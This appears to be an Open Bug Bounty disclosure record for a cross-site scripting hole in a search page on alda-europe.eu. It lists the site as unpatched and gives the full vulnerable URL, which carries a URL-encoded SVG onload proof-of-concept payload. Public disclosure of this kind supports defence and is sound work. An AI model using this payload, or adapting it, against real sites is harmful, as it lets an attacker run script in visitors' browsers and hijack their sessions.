alda-europe.eu XSS vulnerability

2017-10-07T18:09:00
ID OBB:327425
Type openbugbounty
Reporter TestimeOO7
Modified 2018-01-05T18:25:00

Description

Vulnerable URL:
http://www.alda-europe.eu/newSite/searchresults.php?search=1\%22--!%3E%3CSvg%2FOnLoad%3Dconfirm(%22openbugbounty%22)%3E\%22&cat;=calls&scope;=&from;=01%2F01%2F2010&to;=07%2F10%2F2017&EP;=1
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 05.01.2018
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 2400256
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 7 October, 2017 18:09 GMT
Generic security notifications sent to website owner| 7 October, 2017 18:11 GMT
Vulnerability details disclosed by researcher| 5 January, 2018 18:25 GMT